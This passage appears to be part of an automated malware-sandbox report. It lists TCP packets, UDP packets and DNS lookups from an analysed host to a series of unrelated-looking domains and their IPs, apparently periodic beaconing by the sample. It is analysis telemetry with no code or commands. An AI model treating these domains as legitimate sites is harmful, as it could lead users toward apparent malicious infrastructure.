                                                                                                                                  Oct 24, 2024 08:04:01.903156996 CEST805004052.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:01.903301001 CEST5004080192.168.2.452.20.84.62
                                                                                                                                  Oct 24, 2024 08:04:02.732929945 CEST5004080192.168.2.452.20.84.62
                                                                                                                                  Oct 24, 2024 08:04:03.750425100 CEST5004180192.168.2.452.20.84.62
                                                                                                                                  Oct 24, 2024 08:04:03.755834103 CEST805004152.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:03.755898952 CEST5004180192.168.2.452.20.84.62
                                                                                                                                  Oct 24, 2024 08:04:03.767206907 CEST5004180192.168.2.452.20.84.62
                                                                                                                                  Oct 24, 2024 08:04:03.772561073 CEST805004152.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:04.407469034 CEST805004152.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:04.441127062 CEST805004152.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:04.442205906 CEST5004180192.168.2.452.20.84.62
                                                                                                                                  Oct 24, 2024 08:04:05.276798010 CEST5004180192.168.2.452.20.84.62
                                                                                                                                  Oct 24, 2024 08:04:06.296138048 CEST5004280192.168.2.452.20.84.62
                                                                                                                                  Oct 24, 2024 08:04:06.302140951 CEST805004252.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:06.302406073 CEST5004280192.168.2.452.20.84.62
                                                                                                                                  Oct 24, 2024 08:04:06.316636086 CEST5004280192.168.2.452.20.84.62
                                                                                                                                  Oct 24, 2024 08:04:06.322499990 CEST805004252.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:06.322545052 CEST805004252.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:06.322576046 CEST805004252.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:06.322602987 CEST805004252.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:06.322630882 CEST805004252.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:06.322698116 CEST805004252.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:06.322726011 CEST805004252.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:06.322757959 CEST805004252.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:06.322786093 CEST805004252.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:06.975811005 CEST805004252.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:07.013377905 CEST805004252.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:07.013442039 CEST5004280192.168.2.452.20.84.62
                                                                                                                                  Oct 24, 2024 08:04:07.823587894 CEST5004280192.168.2.452.20.84.62
                                                                                                                                  Oct 24, 2024 08:04:08.841902018 CEST5004380192.168.2.452.20.84.62
                                                                                                                                  Oct 24, 2024 08:04:08.886890888 CEST805004352.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:08.891686916 CEST5004380192.168.2.452.20.84.62
                                                                                                                                  Oct 24, 2024 08:04:08.901424885 CEST5004380192.168.2.452.20.84.62
                                                                                                                                  Oct 24, 2024 08:04:08.906934977 CEST805004352.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:09.582313061 CEST805004352.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:09.616599083 CEST805004352.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:09.616740942 CEST5004380192.168.2.452.20.84.62
                                                                                                                                  Oct 24, 2024 08:04:09.617779970 CEST5004380192.168.2.452.20.84.62
                                                                                                                                  Oct 24, 2024 08:04:09.624871016 CEST805004352.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:14.654799938 CEST5004480192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:14.660274982 CEST80500443.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:14.660764933 CEST5004480192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:14.669733047 CEST5004480192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:14.675549984 CEST80500443.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:15.293401957 CEST80500443.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:15.293627977 CEST5004480192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:16.183418036 CEST5004480192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:16.189342022 CEST80500443.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:17.203664064 CEST5004580192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:17.209417105 CEST80500453.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:17.209553003 CEST5004580192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:17.223931074 CEST5004580192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:17.229794025 CEST80500453.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:18.730659008 CEST5004580192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:18.737083912 CEST80500453.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:18.742768049 CEST5004580192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:19.748864889 CEST5004680192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:19.754643917 CEST80500463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:19.754734039 CEST5004680192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:19.763864994 CEST5004680192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:19.769810915 CEST80500463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:19.769856930 CEST80500463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:19.769885063 CEST80500463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:19.769912958 CEST80500463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:19.769970894 CEST80500463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:19.770030022 CEST80500463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:19.770060062 CEST80500463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:19.770087957 CEST80500463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:19.770116091 CEST80500463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:21.276828051 CEST5004680192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:21.283118010 CEST80500463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:21.283308983 CEST5004680192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:22.295094967 CEST5004780192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:22.301141024 CEST80500473.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:22.306771040 CEST5004780192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:22.324640036 CEST5004780192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:22.330451965 CEST80500473.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:23.949486017 CEST80500473.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:23.950114965 CEST80500473.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:23.950320959 CEST5004780192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:23.952974081 CEST5004780192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:23.958738089 CEST80500473.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:29.258044958 CEST5004880192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:29.263850927 CEST8050048142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:29.264061928 CEST5004880192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:29.277343988 CEST5004880192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:29.282810926 CEST8050048142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:30.249777079 CEST8050048142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:30.292422056 CEST5004880192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:30.379283905 CEST8050048142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:30.384265900 CEST5004880192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:30.792503119 CEST5004880192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:31.810949087 CEST5004980192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:31.884586096 CEST8050049142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:31.884819031 CEST5004980192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:31.896152020 CEST5004980192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:31.901792049 CEST8050049142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:32.837163925 CEST8050049142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:32.886049986 CEST5004980192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:32.958301067 CEST8050049142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:32.958596945 CEST5004980192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:33.401726961 CEST5004980192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:34.420646906 CEST5005080192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:34.426186085 CEST8050050142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:34.428679943 CEST5005080192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:34.440768003 CEST5005080192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:34.446681976 CEST8050050142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:34.446703911 CEST8050050142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:34.446717024 CEST8050050142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:34.446728945 CEST8050050142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:34.446754932 CEST8050050142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:34.446768045 CEST8050050142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:34.446779966 CEST8050050142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:34.446791887 CEST8050050142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:34.446803093 CEST8050050142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:35.374715090 CEST8050050142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:35.417323112 CEST5005080192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:35.494126081 CEST8050050142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:35.494323015 CEST5005080192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:35.948725939 CEST5005080192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:36.968543053 CEST5005180192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:36.974323988 CEST8050051142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:36.980776072 CEST5005180192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:36.984633923 CEST5005180192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:36.990405083 CEST8050051142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:37.922194004 CEST8050051142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:37.964229107 CEST5005180192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:38.041733027 CEST8050051142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:38.041881084 CEST5005180192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:38.042768002 CEST5005180192.168.2.4142.250.186.83
                                                                                                                                  Oct 24, 2024 08:04:38.048394918 CEST8050051142.250.186.83192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:43.081721067 CEST5005280192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:43.090186119 CEST8050052172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:43.090334892 CEST5005280192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:43.105602026 CEST5005280192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:43.111613035 CEST8050052172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:43.597547054 CEST8050052172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:43.597788095 CEST5005280192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:44.620569944 CEST5005280192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:44.626730919 CEST8050052172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:45.638631105 CEST5005380192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:45.644609928 CEST8050053172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:45.644699097 CEST5005380192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:45.653672934 CEST5005380192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:45.659434080 CEST8050053172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:46.150494099 CEST8050053172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:46.153040886 CEST5005380192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:47.167506933 CEST5005380192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:47.173175097 CEST8050053172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:48.185678005 CEST5005480192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:48.348596096 CEST8050054172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:48.354537964 CEST5005480192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:48.360774040 CEST5005480192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:48.366657019 CEST8050054172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:48.366728067 CEST8050054172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:48.366758108 CEST8050054172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:48.366786003 CEST8050054172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:48.366812944 CEST8050054172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:48.366868019 CEST8050054172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:48.366895914 CEST8050054172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:48.366923094 CEST8050054172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:48.366951942 CEST8050054172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:48.860563040 CEST8050054172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:48.861759901 CEST5005480192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:49.870652914 CEST5005480192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:49.876667976 CEST8050054172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:50.888809919 CEST5005580192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:50.894787073 CEST8050055172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:50.897676945 CEST5005580192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:50.909794092 CEST5005580192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:50.915379047 CEST8050055172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:51.399091959 CEST8050055172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:51.399210930 CEST5005580192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:51.400095940 CEST5005580192.168.2.4172.81.61.224
                                                                                                                                  Oct 24, 2024 08:04:51.405714035 CEST8050055172.81.61.224192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:56.437323093 CEST5005680192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:56.444000006 CEST80500563.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:56.444217920 CEST5005680192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:56.458575964 CEST5005680192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:56.464730024 CEST80500563.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:57.080620050 CEST80500563.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:57.080718040 CEST5005680192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:57.964241982 CEST5005680192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:57.970251083 CEST80500563.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:58.982498884 CEST5005780192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:58.988084078 CEST80500573.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:58.990601063 CEST5005780192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:59.002609015 CEST5005780192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:04:59.008332968 CEST80500573.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:05:00.514601946 CEST5005780192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:05:00.520837069 CEST80500573.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:05:00.526652098 CEST5005780192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:05:01.530056000 CEST5005880192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:05:01.535835981 CEST80500583.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:05:01.535959959 CEST5005880192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:05:01.549972057 CEST5005880192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:05:01.555814028 CEST80500583.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:05:01.555857897 CEST80500583.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:05:01.555888891 CEST80500583.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:05:01.555916071 CEST80500583.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:05:01.555944920 CEST80500583.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:05:01.555979013 CEST80500583.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:05:01.556008101 CEST80500583.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:05:01.556035995 CEST80500583.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:05:01.556063890 CEST80500583.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:05:02.183532000 CEST80500583.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:05:02.190581083 CEST5005880192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:05:03.281073093 CEST5005880192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:05:03.286623001 CEST80500583.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:05:04.295176029 CEST5005980192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:05:04.301156998 CEST80500593.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:05:04.301448107 CEST5005980192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:05:04.308687925 CEST5005980192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:05:04.314342976 CEST80500593.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:05:04.937974930 CEST80500593.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:05:04.938565016 CEST80500593.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:05:04.938834906 CEST5005980192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:05:04.940757036 CEST5005980192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:05:04.946450949 CEST80500593.33.130.190192.168.2.4

                                                                                                                                  UDP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Oct 24, 2024 08:01:34.623094082 CEST5512853192.168.2.41.1.1.1
                                                                                                                                  Oct 24, 2024 08:01:35.012753963 CEST53551281.1.1.1192.168.2.4
                                                                                                                                  Oct 24, 2024 08:01:51.564795971 CEST5482953192.168.2.41.1.1.1
                                                                                                                                  Oct 24, 2024 08:01:51.590894938 CEST53548291.1.1.1192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:05.077291965 CEST5950053192.168.2.41.1.1.1
                                                                                                                                  Oct 24, 2024 08:02:05.086961031 CEST53595001.1.1.1192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:13.142466068 CEST6526253192.168.2.41.1.1.1
                                                                                                                                  Oct 24, 2024 08:02:13.267828941 CEST53652621.1.1.1192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:26.907074928 CEST6457153192.168.2.41.1.1.1
                                                                                                                                  Oct 24, 2024 08:02:27.499429941 CEST53645711.1.1.1192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:41.265954971 CEST5199853192.168.2.41.1.1.1
                                                                                                                                  Oct 24, 2024 08:02:41.279706001 CEST53519981.1.1.1192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:55.405817986 CEST5134253192.168.2.41.1.1.1
                                                                                                                                  Oct 24, 2024 08:02:55.426300049 CEST53513421.1.1.1192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:09.202682972 CEST5515953192.168.2.41.1.1.1
                                                                                                                                  Oct 24, 2024 08:03:09.817275047 CEST53551591.1.1.1192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:24.437043905 CEST6051653192.168.2.41.1.1.1
                                                                                                                                  Oct 24, 2024 08:03:24.461066961 CEST53605161.1.1.1192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:38.765121937 CEST5556353192.168.2.41.1.1.1
                                                                                                                                  Oct 24, 2024 08:03:38.776810884 CEST53555631.1.1.1192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:46.844693899 CEST5553053192.168.2.41.1.1.1
                                                                                                                                  Oct 24, 2024 08:03:47.183788061 CEST53555301.1.1.1192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:01.000586987 CEST5648153192.168.2.41.1.1.1
                                                                                                                                  Oct 24, 2024 08:04:01.195727110 CEST53564811.1.1.1192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:14.624562979 CEST6532953192.168.2.41.1.1.1
                                                                                                                                  Oct 24, 2024 08:04:14.651712894 CEST53653291.1.1.1192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:28.970629930 CEST5424753192.168.2.41.1.1.1
                                                                                                                                  Oct 24, 2024 08:04:29.255003929 CEST53542471.1.1.1192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:43.063146114 CEST5454153192.168.2.41.1.1.1
                                                                                                                                  Oct 24, 2024 08:04:43.077860117 CEST53545411.1.1.1192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:56.418346882 CEST5632953192.168.2.41.1.1.1
                                                                                                                                  Oct 24, 2024 08:04:56.432395935 CEST53563291.1.1.1192.168.2.4

                                                                                                                                  DNS Queries

                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                  Oct 24, 2024 08:01:34.623094082 CEST192.168.2.41.1.1.10xe39eStandard query (0)www.specialgift.asiaA (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:01:51.564795971 CEST192.168.2.41.1.1.10x57e7Standard query (0)www.filelabel.infoA (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:02:05.077291965 CEST192.168.2.41.1.1.10x9cf4Standard query (0)www.longfilsalphonse.netA (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:02:13.142466068 CEST192.168.2.41.1.1.10x2cf4Standard query (0)www.multileveltravel.worldA (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:02:26.907074928 CEST192.168.2.41.1.1.10x6441Standard query (0)www.40wxd.topA (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:02:41.265954971 CEST192.168.2.41.1.1.10x82b1Standard query (0)www.vasehub.xyzA (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:02:55.405817986 CEST192.168.2.41.1.1.10x2d02Standard query (0)www.coffee-and-blends.infoA (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:03:09.202682972 CEST192.168.2.41.1.1.10x531Standard query (0)www.tmstore.clickA (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:03:24.437043905 CEST192.168.2.41.1.1.10xbf40Standard query (0)www.softillery.infoA (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:03:38.765121937 CEST192.168.2.41.1.1.10xc035Standard query (0)www.gemtastic.shopA (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:03:46.844693899 CEST192.168.2.41.1.1.10x14fcStandard query (0)www.nad5.shopA (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:04:01.000586987 CEST192.168.2.41.1.1.10x4245Standard query (0)www.luxe.guruA (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:04:14.624562979 CEST192.168.2.41.1.1.10x397cStandard query (0)www.digitalbloom.infoA (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:04:28.970629930 CEST192.168.2.41.1.1.10x884fStandard query (0)www.amitayush.digitalA (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:04:43.063146114 CEST192.168.2.41.1.1.10x5776Standard query (0)www.moritynomxd.xyzA (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:04:56.418346882 CEST192.168.2.41.1.1.10xeb83Standard query (0)www.tukaari.shopA (IP address)IN (0x0001)false

                                                                                                                                  DNS Answers

                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                  Oct 24, 2024 08:01:35.012753963 CEST1.1.1.1192.168.2.40xe39eNo error (0)www.specialgift.asiawww.specialgift.asia.s.strikinglydns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:01:35.012753963 CEST1.1.1.1192.168.2.40xe39eNo error (0)www.specialgift.asia.s.strikinglydns.com35.156.117.131A (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:01:35.012753963 CEST1.1.1.1192.168.2.40xe39eNo error (0)www.specialgift.asia.s.strikinglydns.com18.157.120.97A (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:01:51.590894938 CEST1.1.1.1192.168.2.40x57e7No error (0)www.filelabel.infofilelabel.infoCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:01:51.590894938 CEST1.1.1.1192.168.2.40x57e7No error (0)filelabel.info3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:01:51.590894938 CEST1.1.1.1192.168.2.40x57e7No error (0)filelabel.info15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:02:05.086961031 CEST1.1.1.1192.168.2.40x9cf4Name error (3)www.longfilsalphonse.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:02:13.267828941 CEST1.1.1.1192.168.2.40x2cf4No error (0)www.multileveltravel.worldmultileveltravel.worldCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:02:13.267828941 CEST1.1.1.1192.168.2.40x2cf4No error (0)multileveltravel.world3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:02:13.267828941 CEST1.1.1.1192.168.2.40x2cf4No error (0)multileveltravel.world15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:02:27.499429941 CEST1.1.1.1192.168.2.40x6441No error (0)www.40wxd.top40wxd.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Oct 24, 2024 08:02:27.499429941 CEST1.1.1.1192.168.2.40x6441No error (0)40wxd.top206.119.82.134A (IP address)IN (0x0001)false
